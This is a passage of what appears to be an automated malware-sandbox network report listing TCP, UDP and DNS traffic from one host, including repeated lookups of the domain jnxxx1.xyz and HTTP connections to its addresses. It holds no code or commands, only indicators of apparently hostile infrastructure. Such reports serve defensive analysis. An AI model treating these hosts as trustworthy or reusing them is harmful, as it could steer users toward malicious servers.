                  Jan 14, 2022 14:25:08.513525963 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:08.513669014 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:18.096652031 CET4977080192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:18.172437906 CET8049770104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:18.172559023 CET4977080192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:18.175312996 CET4977080192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:18.259957075 CET8049770104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:18.260062933 CET4977080192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:18.348066092 CET8049770104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:18.682698011 CET8049770104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:18.682831049 CET4977080192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:18.684098005 CET8049770104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:18.684140921 CET4977080192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:18.742661953 CET8049770104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:19.841773033 CET4977180192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:19.897301912 CET8049771104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:19.897445917 CET4977180192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:19.900110006 CET4977180192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:19.937967062 CET8049771104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:19.938043118 CET4977180192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:19.972281933 CET8049771104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:20.352523088 CET8049771104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:20.352603912 CET8049771104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:20.352715969 CET4977180192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:20.352797031 CET4977180192.168.2.4104.21.60.171
                  Jan 14, 2022 14:25:20.443968058 CET8049771104.21.60.171192.168.2.4
                  Jan 14, 2022 14:25:21.100265980 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100362062 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100455999 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100528002 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100599051 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100646019 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100672007 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100711107 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100743055 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.100778103 CET49703443192.168.2.4204.79.197.200
                  Jan 14, 2022 14:25:21.116976023 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117002010 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117012978 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117023945 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117037058 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117047071 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117058039 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117089987 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117180109 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117206097 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117228031 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117238998 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117290974 CET44349703204.79.197.200192.168.2.4
                  Jan 14, 2022 14:25:21.117326975 CET44349703204.79.197.200192.168.2.4

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 14, 2022 14:25:18.056624889 CET5309753192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:18.082303047 CET53530978.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:19.820640087 CET4925753192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:19.840229034 CET53492578.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:21.168129921 CET6238953192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:21.190475941 CET53623898.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:23.134006977 CET4991053192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:23.153997898 CET53499108.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:25.017433882 CET5585453192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:25.042206049 CET53558548.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:26.369333982 CET6454953192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:26.386985064 CET53645498.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:27.930038929 CET6315353192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:27.955796957 CET53631538.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:30.142900944 CET5299153192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:30.163605928 CET53529918.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:31.608867884 CET5370053192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:31.626277924 CET53537008.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:32.993509054 CET5172653192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:33.019890070 CET53517268.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:34.589889050 CET5679453192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:34.609421015 CET53567948.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:35.890702963 CET5653453192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:35.910164118 CET53565348.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:37.271411896 CET5662753192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:37.289113045 CET53566278.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:38.860811949 CET5662153192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:38.878523111 CET53566218.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:41.510195971 CET6407853192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:41.529974937 CET53640788.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:43.901807070 CET6480153192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:43.926961899 CET53648018.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:46.438158035 CET6172153192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:46.466119051 CET53617218.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:48.264461994 CET5125553192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:48.285516024 CET53512558.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:50.015372992 CET6152253192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:50.034662008 CET53615228.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:51.699372053 CET5233753192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:51.718610048 CET53523378.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:53.013324976 CET5504653192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:53.040281057 CET53550468.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:54.860903025 CET4961253192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:54.880390882 CET53496128.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:57.426099062 CET4928553192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:57.448802948 CET53492858.8.8.8192.168.2.4
                  Jan 14, 2022 14:25:59.264833927 CET5060153192.168.2.48.8.8.8
                  Jan 14, 2022 14:25:59.284394979 CET53506018.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:01.205447912 CET6087553192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:01.225044012 CET53608758.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:02.654102087 CET5644853192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:02.673482895 CET53564488.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:04.113353968 CET5917253192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:04.130435944 CET53591728.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:06.077826977 CET6057953192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:06.095539093 CET53605798.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:07.638314962 CET5979453192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:07.657782078 CET53597948.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:09.248760939 CET6068953192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:09.268064976 CET53606898.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:12.172061920 CET5090453192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:12.191605091 CET53509048.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:17.260008097 CET5752553192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:17.279648066 CET53575258.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:21.247929096 CET5341853192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:21.269567013 CET53534188.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:25.912548065 CET6283353192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:25.929693937 CET53628338.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:31.500365019 CET5926053192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:31.519778967 CET53592608.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:35.253140926 CET4994453192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:35.270370007 CET53499448.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:37.545703888 CET6330053192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:37.565352917 CET53633008.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:38.956957102 CET6144953192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:38.978286028 CET53614498.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:40.463562965 CET5127553192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:40.482383013 CET53512758.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:42.266510963 CET6349253192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:42.286091089 CET53634928.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:44.275732040 CET5894553192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:44.295249939 CET53589458.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:45.937252998 CET6077953192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:45.956788063 CET53607798.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:47.353239059 CET6401453192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:47.373985052 CET53640148.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:48.931447029 CET5709153192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:48.950748920 CET53570918.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:50.353661060 CET5590453192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:50.373054981 CET53559048.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:51.968323946 CET5210953192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:51.989608049 CET53521098.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:54.071371078 CET5445053192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:54.090604067 CET53544508.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:56.679383039 CET4937453192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:56.698745012 CET53493748.8.8.8192.168.2.4
                  Jan 14, 2022 14:26:58.131524086 CET5043653192.168.2.48.8.8.8
                  Jan 14, 2022 14:26:58.151236057 CET53504368.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:01.310575962 CET5425653192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:01.331875086 CET53542568.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:03.261573076 CET5218953192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:03.280853987 CET53521898.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:05.280379057 CET5613153192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:05.299772978 CET53561318.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:08.216839075 CET6299253192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:08.235579014 CET53629928.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:09.910355091 CET5443253192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:09.929234028 CET53544328.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:11.542715073 CET5722753192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:11.562249899 CET53572278.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:12.968863964 CET5838353192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:12.986362934 CET53583838.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:14.357517004 CET6313653192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:14.377444029 CET53631368.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:15.818676949 CET5091153192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:15.835823059 CET53509118.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:17.237107992 CET6340953192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:17.256669044 CET53634098.8.8.8192.168.2.4
                  Jan 14, 2022 14:27:18.602826118 CET5918553192.168.2.48.8.8.8
                  Jan 14, 2022 14:27:18.622642994 CET53591858.8.8.8192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 14, 2022 14:25:18.056624889 CET192.168.2.48.8.8.80x8e89Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:19.820640087 CET192.168.2.48.8.8.80x97d3Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:21.168129921 CET192.168.2.48.8.8.80x8b03Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:23.134006977 CET192.168.2.48.8.8.80xace4Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:25.017433882 CET192.168.2.48.8.8.80xfc4cStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:26.369333982 CET192.168.2.48.8.8.80xcf70Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:27.930038929 CET192.168.2.48.8.8.80x4ff7Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:30.142900944 CET192.168.2.48.8.8.80x7f97Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:31.608867884 CET192.168.2.48.8.8.80x731bStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:32.993509054 CET192.168.2.48.8.8.80x6663Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:34.589889050 CET192.168.2.48.8.8.80xb93aStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:35.890702963 CET192.168.2.48.8.8.80x29d6Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:37.271411896 CET192.168.2.48.8.8.80xe5cStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:38.860811949 CET192.168.2.48.8.8.80x15cStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:41.510195971 CET192.168.2.48.8.8.80x6840Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:43.901807070 CET192.168.2.48.8.8.80x6af4Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:46.438158035 CET192.168.2.48.8.8.80x605aStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:48.264461994 CET192.168.2.48.8.8.80x2f61Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:50.015372992 CET192.168.2.48.8.8.80x1305Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:51.699372053 CET192.168.2.48.8.8.80xc8a9Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:53.013324976 CET192.168.2.48.8.8.80xb114Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:54.860903025 CET192.168.2.48.8.8.80x763dStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:57.426099062 CET192.168.2.48.8.8.80x4a3cStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:59.264833927 CET192.168.2.48.8.8.80x64efStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:01.205447912 CET192.168.2.48.8.8.80x2e50Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:02.654102087 CET192.168.2.48.8.8.80x59d9Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:04.113353968 CET192.168.2.48.8.8.80xacb9Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:06.077826977 CET192.168.2.48.8.8.80x9f0bStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:07.638314962 CET192.168.2.48.8.8.80x4d46Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:09.248760939 CET192.168.2.48.8.8.80x5feeStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:12.172061920 CET192.168.2.48.8.8.80x575aStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:17.260008097 CET192.168.2.48.8.8.80xa3ceStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:21.247929096 CET192.168.2.48.8.8.80xe127Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:25.912548065 CET192.168.2.48.8.8.80x5d13Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:31.500365019 CET192.168.2.48.8.8.80x21b9Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:35.253140926 CET192.168.2.48.8.8.80xb7faStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:37.545703888 CET192.168.2.48.8.8.80xd6baStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:38.956957102 CET192.168.2.48.8.8.80x3feStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:40.463562965 CET192.168.2.48.8.8.80x330eStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:42.266510963 CET192.168.2.48.8.8.80x7f5dStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:44.275732040 CET192.168.2.48.8.8.80xcb02Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:45.937252998 CET192.168.2.48.8.8.80x6dfbStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:47.353239059 CET192.168.2.48.8.8.80x2a39Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:48.931447029 CET192.168.2.48.8.8.80x61e6Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:50.353661060 CET192.168.2.48.8.8.80xd717Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:51.968323946 CET192.168.2.48.8.8.80xbdacStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:54.071371078 CET192.168.2.48.8.8.80x6bf6Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:56.679383039 CET192.168.2.48.8.8.80x57efStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:26:58.131524086 CET192.168.2.48.8.8.80xfb1eStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:01.310575962 CET192.168.2.48.8.8.80x2659Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:03.261573076 CET192.168.2.48.8.8.80xb719Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:05.280379057 CET192.168.2.48.8.8.80x3b77Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:08.216839075 CET192.168.2.48.8.8.80x80bcStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:09.910355091 CET192.168.2.48.8.8.80xec4dStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:11.542715073 CET192.168.2.48.8.8.80xc52aStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:12.968863964 CET192.168.2.48.8.8.80x830cStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:14.357517004 CET192.168.2.48.8.8.80x5f51Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:15.818676949 CET192.168.2.48.8.8.80x6800Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:17.237107992 CET192.168.2.48.8.8.80x4719Standard query (0)jnxxx1.xyzA (IP address)IN (0x0001)
                  Jan 14, 2022 14:27:18.602826118 CET192.168.2.48.8.8.80xbe8aStandard query (0)jnxxx1.xyzA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 14, 2022 14:25:18.082303047 CET8.8.8.8192.168.2.40x8e89No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:18.082303047 CET8.8.8.8192.168.2.40x8e89No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:19.840229034 CET8.8.8.8192.168.2.40x97d3No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:19.840229034 CET8.8.8.8192.168.2.40x97d3No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:21.190475941 CET8.8.8.8192.168.2.40x8b03No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:21.190475941 CET8.8.8.8192.168.2.40x8b03No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:23.153997898 CET8.8.8.8192.168.2.40xace4No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:23.153997898 CET8.8.8.8192.168.2.40xace4No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:25.042206049 CET8.8.8.8192.168.2.40xfc4cNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:25.042206049 CET8.8.8.8192.168.2.40xfc4cNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:26.386985064 CET8.8.8.8192.168.2.40xcf70No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:26.386985064 CET8.8.8.8192.168.2.40xcf70No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:27.955796957 CET8.8.8.8192.168.2.40x4ff7No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:27.955796957 CET8.8.8.8192.168.2.40x4ff7No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:30.163605928 CET8.8.8.8192.168.2.40x7f97No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:30.163605928 CET8.8.8.8192.168.2.40x7f97No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:31.626277924 CET8.8.8.8192.168.2.40x731bNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:31.626277924 CET8.8.8.8192.168.2.40x731bNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:33.019890070 CET8.8.8.8192.168.2.40x6663No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:33.019890070 CET8.8.8.8192.168.2.40x6663No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:34.609421015 CET8.8.8.8192.168.2.40xb93aNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:34.609421015 CET8.8.8.8192.168.2.40xb93aNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:35.910164118 CET8.8.8.8192.168.2.40x29d6No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:35.910164118 CET8.8.8.8192.168.2.40x29d6No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:37.289113045 CET8.8.8.8192.168.2.40xe5cNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:37.289113045 CET8.8.8.8192.168.2.40xe5cNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:38.878523111 CET8.8.8.8192.168.2.40x15cNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:38.878523111 CET8.8.8.8192.168.2.40x15cNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:41.529974937 CET8.8.8.8192.168.2.40x6840No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:41.529974937 CET8.8.8.8192.168.2.40x6840No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:43.926961899 CET8.8.8.8192.168.2.40x6af4No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:43.926961899 CET8.8.8.8192.168.2.40x6af4No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:46.466119051 CET8.8.8.8192.168.2.40x605aNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:46.466119051 CET8.8.8.8192.168.2.40x605aNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:48.285516024 CET8.8.8.8192.168.2.40x2f61No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:48.285516024 CET8.8.8.8192.168.2.40x2f61No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:50.034662008 CET8.8.8.8192.168.2.40x1305No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:50.034662008 CET8.8.8.8192.168.2.40x1305No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:51.718610048 CET8.8.8.8192.168.2.40xc8a9No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:51.718610048 CET8.8.8.8192.168.2.40xc8a9No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:53.040281057 CET8.8.8.8192.168.2.40xb114No error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:53.040281057 CET8.8.8.8192.168.2.40xb114No error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:54.880390882 CET8.8.8.8192.168.2.40x763dNo error (0)jnxxx1.xyz104.21.60.171A (IP address)IN (0x0001)
                  Jan 14, 2022 14:25:54.880390882 CET8.8.8.8192.168.2.40x763dNo error (0)jnxxx1.xyz172.67.198.111A (IP address)IN (0x0001)
